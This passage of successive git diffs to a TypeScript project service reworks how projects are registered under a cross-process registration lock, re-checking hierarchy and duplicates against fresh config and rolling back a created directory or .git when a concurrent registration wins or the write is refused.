-      // Register the project inside the serialized editConfig transform, re-checking for
-      // duplicates and re-deriving the hierarchy from FRESH config: persisting the pre-read
-      // snapshot would clobber concurrent config edits (lost-update race). The async
-      // validations above (git roots, sub-project depth) ran against the snapshot; the
-      // transform only re-resolves state that a concurrent edit could have changed.
-      let createResult: Result<{ projectConfig: ProjectConfig; normalizedPath: string }> =
-        Err("Project already exists");
-      // Distinguishes in-transform failures for directory cleanup: when a concurrent
-      // call registered this same path ("duplicate"), the directory belongs to that
-      // winner and must not be deleted; other rejections leave the directory ours.
-      let transformFailure:
-        | "duplicate"
-        | "depth"
-        | "hierarchy-changed"
-        | "hierarchy-changed-descendant"
-        | null = null;
-      await this.config.editConfig(
-        (freshConfig) => {
-          if (freshConfig.projects.has(normalizedPath) || freshConfig.projects.has(canonicalPath)) {
-            transformFailure = "duplicate";
-            createResult = Err("Project already exists");
-            return freshConfig;
-          }
-          freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
-          // Re-run the sub-project depth check against FRESH hierarchy: a concurrent
-          // registration (e.g. /repo/pkg landing while /repo/pkg/api is validating)
-          // can introduce a sub-project ancestor that the snapshot-time check missed,
-          // which would persist a second-level sub-project.
-          if (hasRegisteredSubProjectAncestor(normalizedPath, freshConfig.projects)) {
-            transformFailure = "depth";
-            createResult = Err("Sub-projects can only be one level deep");
-            return freshConfig;
-          }
-          const freshParentProjectPath = findDeepestTopLevelParentProject(
-            normalizedPath,
-            freshConfig.projects
-          );
-          // The same-git-repository validations above ran against the snapshot hierarchy
-          // only, and this transform is synchronous so it cannot re-run readGitTopLevel.
-          // If a concurrent edit introduced a different parent or new descendants, those
-          // were never git-validated — reject instead of persisting an unvalidated
-          // hierarchy (e.g. a sub-project from a different git repository).
-          const freshDescendantProjectPaths = Array.from(freshConfig.projects.keys()).filter(
-            (candidatePath) => isPathDescendant(normalizedPath, candidatePath)
-          );
-          const hasNewDescendantProject = freshDescendantProjectPaths.some(
-            (candidatePath) => !descendantProjectPaths.includes(candidatePath)
-          );
-          // Re-check the canonical parent for initGit: the snapshot-time rejection above
-          // can miss a parent registered concurrently, and the lexical freshParent check
-          // below cannot see it when this path reaches the checkout through a symlink.
-          if (
-            options?.initGit &&
-            findDeepestTopLevelParentProject(canonicalPath, freshConfig.projects)
-          ) {
-            transformFailure = "hierarchy-changed";
-            createResult = Err("Project hierarchy changed concurrently; please retry");
-            return freshConfig;
-          }
-          if (freshParentProjectPath !== parentProjectPath || hasNewDescendantProject) {
-            // A new descendant registered under this path claims the directory tree we
-            // created: recursive cleanup would delete that project's checkout, so treat
-            // it like the duplicate case and leave the directory alone.
-            transformFailure = hasNewDescendantProject
-              ? "hierarchy-changed-descendant"
-              : "hierarchy-changed";
-            createResult = Err("Project hierarchy changed concurrently; please retry");
-            return freshConfig;
-          }
-          const projectConfig: ProjectConfig = {
-            workspaces: [],
-            parentProjectPath: freshParentProjectPath ?? undefined,
-            // Set in the same config write as the registration (a backup restore names
-            // imported projects) rather than as a second write and notification.
-            ...(options?.displayName !== undefined ? { displayName: options.displayName } : {}),
-          };
-          freshConfig.projects.set(normalizedPath, projectConfig);
-          freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
-          createResult = Ok({ projectConfig, normalizedPath });
-          return freshConfig;
-        },
-        // A withRegistrationLock caller already holds the registration lock; create() lets
-        // this edit take it. Either way a lock failure (a wait on another process timing
-        // out, an unwritable locks directory) is caught below like every other failure, so
-        // the Result contract holds.
-        lock === null ? {} : { withinRegistrationLock: lock }
-      );
-
-      // Do NOT clean up the created directory when a concurrent registration claims
-      // it: a duplicate owns this exact path, and a new descendant project lives
-      // inside the tree we created — recursive removal would destroy the winner's
-      // checkout either way (including files created after its call returned). Only
-      // depth and parent-only hierarchy rejections leave the directory ours to remove.
-      if (transformFailure === "depth" || transformFailure === "hierarchy-changed") {
-        await cleanupCreatedDirectory();
-      } else if (
-        (transformFailure === "hierarchy-changed-descendant" || transformFailure === "duplicate") &&
-        initializedGitDir
-      ) {
-        // The winning registration owns the files (a duplicate winner registered this
-        // exact pre-existing directory; a descendant winner lives inside it), but the
-        // .git this losing request created would silently turn the winner's project
-        // into a repository it never asked for, or wrap its checkout in an
-        // unregistered outer repository that changes git discovery.
-        await fsPromises
-          .rm(path.join(normalizedPath, ".git"), { recursive: true, force: true })
-          .catch((cleanupError: unknown) => {
-            log.error(`Failed to roll back git init in ${normalizedPath}:`, cleanupError);
-          });
-      }
-      if (createResult.success && !this.config.loadConfigOrDefault().projects.has(normalizedPath)) {
-        // Config persistence (editConfig → private saveConfig) logs-and-continues on
-        // write failures. Without this check a git-initialized project would report
-        // success, vanish after restart, and block retries on the leftover .git.
-        await cleanupCreatedDirectory();
-        return Err("Failed to save project configuration");
-      }
-      return createResult;
+        if (
+          createResult.success &&
+          !this.config.loadConfigOrDefault().projects.has(normalizedPath)
+        ) {
+          // Config persistence (editConfig → private saveConfig) logs-and-continues on
+          // write failures. Without this check a git-initialized project would report
+          // success, vanish after restart, and block retries on the leftover .git.
+          await cleanupCreatedDirectory();
+          return Err("Failed to save project configuration");
+        }
+        return createResult;
+      };
+      // A lock failure (a wait on another process timing out, an unwritable locks
+      // directory) is caught below like every other failure, so the Result contract holds.
+      return lock === null
+        ? await withProjectRegistrationLock(this.config.rootDir, register)
+        : await register(lock);
     } catch (error) {
       const message = getErrorMessage(error);
       return Err(`Failed to create project: ${message}`);

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -1,4 +1,4 @@
-import { SecretsStore, type Config, type ProjectConfig } from "@/node/config";
+import { SecretsStore, type Config, type ProjectConfig, type ProjectsConfig } from "@/node/config";
 import { formatSshEndpoint } from "@/common/utils/ssh/formatSshEndpoint";
 import { SSH_PROTOCOL_SCHEMES } from "@/constants/git";
 import { spawn } from "child_process";
@@ -56,6 +56,7 @@ import {
 import type { MCPServerManager } from "@/node/services/mcpServerManager";
 import {
   type ProjectRegistrationLockHandle,
+  withProjectRegistrationFileLock,
   withProjectRegistrationLock,
 } from "@/node/config/projectRegistrationLock";
 import { isProjectTrusted } from "@/node/utils/projectTrust";
@@ -706,76 +707,95 @@ export class ProjectService {
           | "hierarchy-changed"
           | "hierarchy-changed-descendant"
           | null = null;
-        await this.config.editConfig(
-          (freshConfig) => {
-            if (
-              freshConfig.projects.has(normalizedPath) ||
-              freshConfig.projects.has(canonicalPath)
-            ) {
-              transformFailure = "duplicate";
-              createResult = Err("Project already exists");
-              return freshConfig;
-            }
-            freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
-            // Re-run the sub-project depth check against FRESH hierarchy: a concurrent
-            // registration (e.g. /repo/pkg landing while /repo/pkg/api is validating)
-            // can introduce a sub-project ancestor that the snapshot-time check missed,
-            // which would persist a second-level sub-project.
-            if (hasRegisteredSubProjectAncestor(normalizedPath, freshConfig.projects)) {
-              transformFailure = "depth";
-              createResult = Err("Sub-projects can only be one level deep");
-              return freshConfig;
-            }
-            const freshParentProjectPath = findDeepestTopLevelParentProject(
-              normalizedPath,
-              freshConfig.projects
-            );
-            // The same-git-repository validations above ran against the snapshot hierarchy
-            // only, and this transform is synchronous so it cannot re-run readGitTopLevel.
-            // If a concurrent edit introduced a different parent or new descendants, those
-            // were never git-validated — reject instead of persisting an unvalidated
-            // hierarchy (e.g. a sub-project from a different git repository).
-            const freshDescendantProjectPaths = Array.from(freshConfig.projects.keys()).filter(
-              (candidatePath) => isPathDescendant(normalizedPath, candidatePath)
-            );
-            const hasNewDescendantProject = freshDescendantProjectPaths.some(
-              (candidatePath) => !descendantProjectPaths.includes(candidatePath)
-            );
-            // Re-check the canonical parent for initGit: the snapshot-time rejection above
-            // can miss a parent registered concurrently, and the lexical freshParent check
-            // below cannot see it when this path reaches the checkout through a symlink.
-            if (
-              options?.initGit &&
-              findDeepestTopLevelParentProject(canonicalPath, freshConfig.projects)
-            ) {
-              transformFailure = "hierarchy-changed";
-              createResult = Err("Project hierarchy changed concurrently; please retry");
-              return freshConfig;
-            }
-            if (freshParentProjectPath !== parentProjectPath || hasNewDescendantProject) {
-              // A new descendant registered under this path claims the directory tree we
-              // created: recursive cleanup would delete that project's checkout, so treat
-              // it like the duplicate case and leave the directory alone.
-              transformFailure = hasNewDescendantProject
-                ? "hierarchy-changed-descendant"
-                : "hierarchy-changed";
-              createResult = Err("Project hierarchy changed concurrently; please retry");
-              return freshConfig;
-            }
-            const projectConfig: ProjectConfig = {
-              workspaces: [],
-              parentProjectPath: freshParentProjectPath ?? undefined,
-              // Set in the same config write as the registration (a backup restore names
-              // imported projects) rather than as a second write and notification.
-              ...(options?.displayName !== undefined ? { displayName: options.displayName } : {}),
-            };
-            freshConfig.projects.set(normalizedPath, projectConfig);
-            freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
-            createResult = Ok({ projectConfig, normalizedPath });
+        // The .git this request initialized is never the winner's to keep (see below).
+        const removeInitializedGitDir = () =>
+          fsPromises
+            .rm(path.join(normalizedPath, ".git"), { recursive: true, force: true })
+            .catch((cleanupError: unknown) => {
+              log.error(`Failed to roll back git init in ${normalizedPath}:`, cleanupError);
+            });
+        const registerEdit = (freshConfig: ProjectsConfig): ProjectsConfig => {
+          if (freshConfig.projects.has(normalizedPath) || freshConfig.projects.has(canonicalPath)) {
+            transformFailure = "duplicate";
+            createResult = Err("Project already exists");
             return freshConfig;
-          },
-          { withinRegistrationLock: lock }
-        );
+          }
+          freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
+          // Re-run the sub-project depth check against FRESH hierarchy: a concurrent
+          // registration (e.g. /repo/pkg landing while /repo/pkg/api is validating)
+          // can introduce a sub-project ancestor that the snapshot-time check missed,
+          // which would persist a second-level sub-project.
+          if (hasRegisteredSubProjectAncestor(normalizedPath, freshConfig.projects)) {
+            transformFailure = "depth";
+            createResult = Err("Sub-projects can only be one level deep");
+            return freshConfig;
+          }
+          const freshParentProjectPath = findDeepestTopLevelParentProject(
+            normalizedPath,
+            freshConfig.projects
+          );
+          // The same-git-repository validations above ran against the snapshot hierarchy
+          // only, and this transform is synchronous so it cannot re-run readGitTopLevel.
+          // If a concurrent edit introduced a different parent or new descendants, those
+          // were never git-validated — reject instead of persisting an unvalidated
+          // hierarchy (e.g. a sub-project from a different git repository).
+          const freshDescendantProjectPaths = Array.from(freshConfig.projects.keys()).filter(
+            (candidatePath) => isPathDescendant(normalizedPath, candidatePath)
+          );
+          const hasNewDescendantProject = freshDescendantProjectPaths.some(
+            (candidatePath) => !descendantProjectPaths.includes(candidatePath)
+          );
+          // Re-check the canonical parent for initGit: the snapshot-time rejection above
+          // can miss a parent registered concurrently, and the lexical freshParent check
+          // below cannot see it when this path reaches the checkout through a symlink.
+          if (
+            options?.initGit &&
+            findDeepestTopLevelParentProject(canonicalPath, freshConfig.projects)
+          ) {
+            transformFailure = "hierarchy-changed";
+            createResult = Err("Project hierarchy changed concurrently; please retry");
+            return freshConfig;
+          }
+          if (freshParentProjectPath !== parentProjectPath || hasNewDescendantProject) {
+            // A new descendant registered under this path claims the directory tree we
+            // created: recursive cleanup would delete that project's checkout, so treat
+            // it like the duplicate case and leave the directory alone.
+            transformFailure = hasNewDescendantProject
+              ? "hierarchy-changed-descendant"
+              : "hierarchy-changed";
+            createResult = Err("Project hierarchy changed concurrently; please retry");
+            return freshConfig;
+          }
+          const projectConfig: ProjectConfig = {
+            workspaces: [],
+            parentProjectPath: freshParentProjectPath ?? undefined,
+            // Set in the same config write as the registration (a backup restore names
+            // imported projects) rather than as a second write and notification.
+            ...(options?.displayName !== undefined ? { displayName: options.displayName } : {}),
+          };
+          freshConfig.projects.set(normalizedPath, projectConfig);
+          freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
+          createResult = Ok({ projectConfig, normalizedPath });
+          return freshConfig;
+        };
+        try {
+          await this.config.editConfig(registerEdit, { withinRegistrationLock: lock });
+        } catch (error) {
+          // The write itself was refused — most likely this process's hold was judged stale
+          // and reclaimed while git init ran (assertStillOwned). Whatever the request wrote
+          // into the directory must not stay behind unregistered: a leftover .git would fail
+          // every retry on the non-empty-directory check. Whether the path is now someone
+          // else's is decided under a hold that is verifiably ours — which a request that
+          // wrote nothing has no reason to wait for.
+          if (createdDirectory || initializedGitDir) {
+            await this.rollBackRefusedCreate(lock, normalizedPath, canonicalPath, {
+              initializedGitDir,
+              cleanupCreatedDirectory,
+              removeInitializedGitDir,
+            });
+          }
+          throw error;
+        }
 
         // Do NOT clean up the created directory when a concurrent registration claims
         // it: a duplicate owns this exact path, and a new descendant project lives
@@ -794,11 +814,7 @@ export class ProjectService {
           // .git this losing request created would silently turn the winner's project
           // into a repository it never asked for, or wrap its checkout in an
           // unregistered outer repository that changes git discovery.
-          await fsPromises
-            .rm(path.join(normalizedPath, ".git"), { recursive: true, force: true })
-            .catch((cleanupError: unknown) => {
-              log.error(`Failed to roll back git init in ${normalizedPath}:`, cleanupError);
-            });
+          await removeInitializedGitDir();
         }
         if (
           createResult.success &&
@@ -824,6 +840,48 @@ export class ProjectService {
       if (gitInitClaimKey) {
         this.activeGitInits.delete(gitInitClaimKey);
       }
+    }
+  }
+
+  /**
+   * Rollback for a create whose registering write threw after the request had mutated the
+   * directory. Under the caller's hold if that is still ours; otherwise — the hold was
+   * reclaimed, and whoever reclaimed it may have registered this very path — under a fresh
+   * hold of the file lock (the in-process leg is the caller's and not reentrant), where the
+   * registry decides: registered by someone else, the directory is theirs and only the .git
+   * this request initialized is removed; not registered, everything the request created is.
+   * Best effort: a failure here is logged, and the create's own error is what the caller sees.
+   */
+  private async rollBackRefusedCreate(
+    lock: ProjectRegistrationLockHandle,
+    normalizedPath: string,
+    canonicalPath: string,
+    created: {
+      initializedGitDir: boolean;
+      cleanupCreatedDirectory: () => Promise<void>;
+      removeInitializedGitDir: () => Promise<void>;
+    }
+  ): Promise<void> {
+    const rollBack = async (): Promise<void> => {
+      const current = this.config.loadConfigOrDefault();
+      if (current.projects.has(normalizedPath) || current.projects.has(canonicalPath)) {
+        if (created.initializedGitDir) await created.removeInitializedGitDir();
+      } else {
+        await created.cleanupCreatedDirectory();
+      }
+    };
+    try {
+      const stillOwned = await lock.assertStillOwned().then(
+        () => true,
+        () => false
+      );
+      if (stillOwned) {
+        await rollBack();
+      } else {
+        await withProjectRegistrationFileLock(this.config.rootDir, rollBack);
+      }
+    } catch (error) {
+      log.error(`Failed to roll back rejected project creation ${normalizedPath}:`, error);
     }
   }
 

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -437,18 +437,14 @@ export class ProjectService {
     projectPath: string,
     options?: { initGit?: boolean; displayName?: string }
   ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> {
-    // Config.editConfig would take the registration lock for the registering write anyway;
-    // taken here, around the whole operation, so withRegistrationLock can hand out a create
-    // that registers inside a window the caller already holds.
-    // The lock itself can fail (a wait on another process timing out, an unwritable locks
-    // directory): converted like every other failure, so create() keeps its Result contract.
-    try {
-      return await withProjectRegistrationLock(this.config.rootDir, (lock) =>
-        this.createUnlocked(projectPath, options, lock)
-      );
-    } catch (error) {
-      return Err(`Failed to create project: ${getErrorMessage(error)}`);
-    }
+    // No registration lock around the validation: it stats, resolves, and runs git against
+    // the new path, which on a slow or unavailable filesystem can take as long as the lock's
+    // wait bound — and every config save in every process waits for that lock, so holding it
+    // here would stall unrelated workspace, task, and settings saves behind one stuck create.
+    // The registering write below takes the lock itself, through editConfig, and re-validates
+    // against the config as it is under that hold; only withRegistrationLock callers, which
+    // already hold a window, register inside it.
+    return this.createUnlocked(projectPath, options, null);
   }
 
   /**
@@ -472,10 +468,11 @@ export class ProjectService {
     );
   }
 
+  /** `lock`: the caller's registration window, or null when editConfig is to take its own. */
   private async createUnlocked(
     projectPath: string,
     options: { initGit?: boolean; displayName?: string } | undefined,
-    lock: ProjectRegistrationLockHandle
+    lock: ProjectRegistrationLockHandle | null
   ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> {
     let gitInitClaimKey: string | null = null;
     try {
@@ -757,9 +754,12 @@ export class ProjectService {
           freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
           createResult = Ok({ projectConfig, normalizedPath });
           return freshConfig;
-          // create() (or a withRegistrationLock caller) already holds the registration lock.
         },
-        { withinRegistrationLock: lock }
+        // A withRegistrationLock caller already holds the registration lock; create() lets
+        // this edit take it. Either way a lock failure (a wait on another process timing
+        // out, an unwritable locks directory) is caught below like every other failure, so
+        // the Result contract holds.
+        lock === null ? {} : { withinRegistrationLock: lock }
       );
 
       // Do NOT clean up the created directory when a concurrent registration claims

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -440,9 +440,15 @@ export class ProjectService {
     // Config.editConfig would take the registration lock for the registering write anyway;
     // taken here, around the whole operation, so withRegistrationLock can hand out a create
     // that registers inside a window the caller already holds.
-    return withProjectRegistrationLock(this.config.rootDir, (lock) =>
-      this.createUnlocked(projectPath, options, lock)
-    );
+    // The lock itself can fail (a wait on another process timing out, an unwritable locks
+    // directory): converted like every other failure, so create() keeps its Result contract.
+    try {
+      return await withProjectRegistrationLock(this.config.rootDir, (lock) =>
+        this.createUnlocked(projectPath, options, lock)
+      );
+    } catch (error) {
+      return Err(`Failed to create project: ${getErrorMessage(error)}`);
+    }
   }
 
   /**

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -434,6 +434,32 @@ export class ProjectService {
     projectPath: string,
     options?: { initGit?: boolean; displayName?: string }
   ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> {
+    // Serialized with a settings-backup restore writing project memory: a registration
+    // landing at a backed-up source path mid-restore would change which local project that
+    // entry belongs to (see withProjectRegistrationLock).
+    return withProjectRegistrationLock(this.config.rootDir, () =>
+      this.createUnlocked(projectPath, options)
+    );
+  }
+
+  /**
+   * Registration held stable — no project can be registered or removed underneath `fn` —
+   * with a `create` that registers inside that window. A backup import resolves its target's
+   * identity, registers it when needed, and writes its memory within one such window, so
+   * the project it wrote into is the project registered when it reports success.
+   */
+  withRegistrationLock<T>(
+    fn: (registrar: { create: ProjectService["create"] }) => Promise<T>
+  ): Promise<T> {
+    return withProjectRegistrationLock(this.config.rootDir, () =>
+      fn({ create: (projectPath, options) => this.createUnlocked(projectPath, options) })
+    );
+  }
+
+  private async createUnlocked(
+    projectPath: string,
+    options?: { initGit?: boolean; displayName?: string }
+  ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> {
     let gitInitClaimKey: string | null = null;
     try {
       // Validate input
@@ -975,14 +1001,17 @@ export class ProjectService {
       }
 
       const projectConfig: ProjectConfig = { workspaces: [] };
-      await this.config.editConfig((freshConfig) => {
-        if (freshConfig.projects.has(normalizedPath)) {
-          return freshConfig;
-        }
-        const updatedProjects = new Map(freshConfig.projects);
-        updatedProjects.set(normalizedPath, projectConfig);
-        return { ...freshConfig, projects: updatedProjects };
-      });
+      // A registration like create()'s, serialized with backup restores the same way.
+      await withProjectRegistrationLock(this.config.rootDir, () =>
+        this.config.editConfig((freshConfig) => {
+          if (freshConfig.projects.has(normalizedPath)) {
+            return freshConfig;
+          }
+          const updatedProjects = new Map(freshConfig.projects);
+          updatedProjects.set(normalizedPath, projectConfig);
+          return { ...freshConfig, projects: updatedProjects };
+        })
+      );
 
       if (!this.config.loadConfigOrDefault().projects.has(normalizedPath)) {
         // Config persistence (editConfig → private saveConfig) logs-and-continues on write

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -784,11 +784,10 @@ export class ProjectService {
           // The write itself was refused — most likely this process's hold was judged stale
           // and reclaimed while git init ran (assertStillOwned). Whatever the request wrote
           // into the directory must not stay behind unregistered: a leftover .git would fail
-          // every retry on the non-empty-directory check. Whether the path is now someone
-          // else's is decided under a hold that is verifiably ours — which a request that
-          // wrote nothing has no reason to wait for.
+          // every retry on the non-empty-directory check. A request that wrote nothing has
+          // nothing to roll back and no lock to wait for.
           if (createdDirectory || initializedGitDir) {
-            await this.rollBackRefusedCreate(lock, normalizedPath, canonicalPath, {
+            await this.rollBackRefusedCreate(lock, normalizedPath, {
               initializedGitDir,
               cleanupCreatedDirectory,
               removeInitializedGitDir,
@@ -845,40 +844,35 @@ export class ProjectService {
 
   /**
    * Rollback for a create whose registering write threw after the request had mutated the
-   * directory. Under the caller's hold if that is still ours; otherwise — the hold was
-   * reclaimed, and whoever reclaimed it may have registered this very path — under a fresh
-   * hold of the file lock (the in-process leg is the caller's and not reentrant), where the
-   * registry decides: registered by someone else, the directory is theirs and only the .git
-   * this request initialized is removed; not registered, everything the request created is.
-   * Best effort: a failure here is logged, and the create's own error is what the caller sees.
+   * directory. With the caller's hold still ours, nothing else can have registered anything
+   * (every registration takes the lock), so everything the request created goes. With the
+   * hold reclaimed, whoever reclaimed it may have registered this very directory meanwhile —
+   * under any spelling, so the registry's keys cannot prove it did not, and resolving every
+   * key's real path here would wait on the same unavailable mounts a restore is bounded
+   * against. The directory therefore stays (an empty one this request created is a harmless
+   * leftover a retry finds empty and uses); only the .git this request initialized goes,
+   * which is never a winner's to keep (see the duplicate case), under a fresh hold of the
+   * file lock so it cannot interleave with a winner's own git init. Best effort: a failure
+   * here is logged, and the create's own error is what the caller sees.
    */
   private async rollBackRefusedCreate(
     lock: ProjectRegistrationLockHandle,
     normalizedPath: string,
-    canonicalPath: string,
     created: {
       initializedGitDir: boolean;
       cleanupCreatedDirectory: () => Promise<void>;
       removeInitializedGitDir: () => Promise<void>;
     }
   ): Promise<void> {
-    const rollBack = async (): Promise<void> => {
-      const current = this.config.loadConfigOrDefault();
-      if (current.projects.has(normalizedPath) || current.projects.has(canonicalPath)) {
-        if (created.initializedGitDir) await created.removeInitializedGitDir();
-      } else {
-        await created.cleanupCreatedDirectory();
-      }
-    };
     try {
       const stillOwned = await lock.assertStillOwned().then(
         () => true,
         () => false
       );
       if (stillOwned) {
-        await rollBack();
-      } else {
-        await withProjectRegistrationFileLock(this.config.rootDir, rollBack);
+        await created.cleanupCreatedDirectory();
+      } else if (created.initializedGitDir) {
+        await withProjectRegistrationFileLock(this.config.rootDir, created.removeInitializedGitDir);
       }
     } catch (error) {
       log.error(`Failed to roll back rejected project creation ${normalizedPath}:`, error);

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -54,7 +54,10 @@ import {
   syncProjectCodeWorkspace,
 } from "@/node/worktree/codeWorkspaceSync";
 import type { MCPServerManager } from "@/node/services/mcpServerManager";
-import { withProjectRegistrationLock } from "@/node/config/projectRegistrationLock";
+import {
+  type ProjectRegistrationLockHandle,
+  withProjectRegistrationLock,
+} from "@/node/config/projectRegistrationLock";
 import { isProjectTrusted } from "@/node/utils/projectTrust";
 
 function orderWorkspacesForCascadeRemoval(
@@ -437,28 +440,36 @@ export class ProjectService {
     // Config.editConfig would take the registration lock for the registering write anyway;
     // taken here, around the whole operation, so withRegistrationLock can hand out a create
     // that registers inside a window the caller already holds.
-    return withProjectRegistrationLock(this.config.rootDir, () =>
-      this.createUnlocked(projectPath, options)
+    return withProjectRegistrationLock(this.config.rootDir, (lock) =>
+      this.createUnlocked(projectPath, options, lock)
     );
   }
 
   /**
    * Registration held stable — no project can be registered or removed underneath `fn` —
-   * with a `create` that registers inside that window. A backup import resolves its target's
-   * identity, registers it when needed, and writes its memory within one such window, so
-   * the project it wrote into is the project registered when it reports success.
+   * with a `create` that registers inside that window and the lock's own ownership check.
+   * A backup import resolves its target's identity, registers it when needed, and writes its
+   * memory within one such window, so the project it wrote into is the project registered
+   * when it reports success.
    */
   withRegistrationLock<T>(
-    fn: (registrar: { create: ProjectService["create"] }) => Promise<T>
+    fn: (registrar: {
+      create: ProjectService["create"];
+      assertStillOwned: ProjectRegistrationLockHandle["assertStillOwned"];
+    }) => Promise<T>
   ): Promise<T> {
-    return withProjectRegistrationLock(this.config.rootDir, () =>
-      fn({ create: (projectPath, options) => this.createUnlocked(projectPath, options) })
+    return withProjectRegistrationLock(this.config.rootDir, (lock) =>
+      fn({
+        create: (projectPath, options) => this.createUnlocked(projectPath, options, lock),
+        assertStillOwned: () => lock.assertStillOwned(),
+      })
     );
   }
 
   private async createUnlocked(
     projectPath: string,
-    options?: { initGit?: boolean; displayName?: string }
+    options: { initGit?: boolean; displayName?: string } | undefined,
+    lock: ProjectRegistrationLockHandle
   ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> {
     let gitInitClaimKey: string | null = null;
     try {
@@ -742,7 +753,7 @@ export class ProjectService {
           return freshConfig;
           // create() (or a withRegistrationLock caller) already holds the registration lock.
         },
-        { withinRegistrationLock: true }
+        { withinRegistrationLock: lock }
       );
 
       // Do NOT clean up the created directory when a concurrent registration claims

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -54,7 +54,7 @@ import {
   syncProjectCodeWorkspace,
 } from "@/node/worktree/codeWorkspaceSync";
 import type { MCPServerManager } from "@/node/services/mcpServerManager";
-import { withProjectRegistrationLock } from "@/node/services/refinement/targetMutationLocks";
+import { withProjectRegistrationLock } from "@/node/config/projectRegistrationLock";
 import { isProjectTrusted } from "@/node/utils/projectTrust";
 
 function orderWorkspacesForCascadeRemoval(
@@ -434,9 +434,9 @@ export class ProjectService {
     projectPath: string,
     options?: { initGit?: boolean; displayName?: string }
   ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> {
-    // Serialized with a settings-backup restore writing project memory: a registration
-    // landing at a backed-up source path mid-restore would change which local project that
-    // entry belongs to (see withProjectRegistrationLock).
+    // Config.editConfig would take the registration lock for the registering write anyway;
+    // taken here, around the whole operation, so withRegistrationLock can hand out a create
+    // that registers inside a window the caller already holds.
     return withProjectRegistrationLock(this.config.rootDir, () =>
       this.createUnlocked(projectPath, options)
     );
@@ -676,70 +676,74 @@ export class ProjectService {
         | "hierarchy-changed"
         | "hierarchy-changed-descendant"
         | null = null;
-      await this.config.editConfig((freshConfig) => {
-        if (freshConfig.projects.has(normalizedPath) || freshConfig.projects.has(canonicalPath)) {
-          transformFailure = "duplicate";
-          createResult = Err("Project already exists");
+      await this.config.editConfig(
+        (freshConfig) => {
+          if (freshConfig.projects.has(normalizedPath) || freshConfig.projects.has(canonicalPath)) {
+            transformFailure = "duplicate";
+            createResult = Err("Project already exists");
+            return freshConfig;
+          }
+          freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
+          // Re-run the sub-project depth check against FRESH hierarchy: a concurrent
+          // registration (e.g. /repo/pkg landing while /repo/pkg/api is validating)
+          // can introduce a sub-project ancestor that the snapshot-time check missed,
+          // which would persist a second-level sub-project.
+          if (hasRegisteredSubProjectAncestor(normalizedPath, freshConfig.projects)) {
+            transformFailure = "depth";
+            createResult = Err("Sub-projects can only be one level deep");
+            return freshConfig;
+          }
+          const freshParentProjectPath = findDeepestTopLevelParentProject(
+            normalizedPath,
+            freshConfig.projects
+          );
+          // The same-git-repository validations above ran against the snapshot hierarchy
+          // only, and this transform is synchronous so it cannot re-run readGitTopLevel.
+          // If a concurrent edit introduced a different parent or new descendants, those
+          // were never git-validated — reject instead of persisting an unvalidated
+          // hierarchy (e.g. a sub-project from a different git repository).
+          const freshDescendantProjectPaths = Array.from(freshConfig.projects.keys()).filter(
+            (candidatePath) => isPathDescendant(normalizedPath, candidatePath)
+          );
+          const hasNewDescendantProject = freshDescendantProjectPaths.some(
+            (candidatePath) => !descendantProjectPaths.includes(candidatePath)
+          );
+          // Re-check the canonical parent for initGit: the snapshot-time rejection above
+          // can miss a parent registered concurrently, and the lexical freshParent check
+          // below cannot see it when this path reaches the checkout through a symlink.
+          if (
+            options?.initGit &&
+            findDeepestTopLevelParentProject(canonicalPath, freshConfig.projects)
+          ) {
+            transformFailure = "hierarchy-changed";
+            createResult = Err("Project hierarchy changed concurrently; please retry");
+            return freshConfig;
+          }
+          if (freshParentProjectPath !== parentProjectPath || hasNewDescendantProject) {
+            // A new descendant registered under this path claims the directory tree we
+            // created: recursive cleanup would delete that project's checkout, so treat
+            // it like the duplicate case and leave the directory alone.
+            transformFailure = hasNewDescendantProject
+              ? "hierarchy-changed-descendant"
+              : "hierarchy-changed";
+            createResult = Err("Project hierarchy changed concurrently; please retry");
+            return freshConfig;
+          }
+          const projectConfig: ProjectConfig = {
+            workspaces: [],
+            parentProjectPath: freshParentProjectPath ?? undefined,
+            // Set in the same config write as the registration (a backup restore names
+            // imported projects) rather than as a second write and notification.
+            ...(options?.displayName !== undefined ? { displayName: options.displayName } : {}),
+          };
+          freshConfig.projects.set(normalizedPath, projectConfig);
+          freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
+          createResult = Ok({ projectConfig, normalizedPath });
           return freshConfig;
-        }
-        freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
-        // Re-run the sub-project depth check against FRESH hierarchy: a concurrent
-        // registration (e.g. /repo/pkg landing while /repo/pkg/api is validating)
-        // can introduce a sub-project ancestor that the snapshot-time check missed,
-        // which would persist a second-level sub-project.
-        if (hasRegisteredSubProjectAncestor(normalizedPath, freshConfig.projects)) {
-          transformFailure = "depth";
-          createResult = Err("Sub-projects can only be one level deep");
-          return freshConfig;
-        }
-        const freshParentProjectPath = findDeepestTopLevelParentProject(
-          normalizedPath,
-          freshConfig.projects
-        );
-        // The same-git-repository validations above ran against the snapshot hierarchy
-        // only, and this transform is synchronous so it cannot re-run readGitTopLevel.
-        // If a concurrent edit introduced a different parent or new descendants, those
-        // were never git-validated — reject instead of persisting an unvalidated
-        // hierarchy (e.g. a sub-project from a different git repository).
-        const freshDescendantProjectPaths = Array.from(freshConfig.projects.keys()).filter(
-          (candidatePath) => isPathDescendant(normalizedPath, candidatePath)
-        );
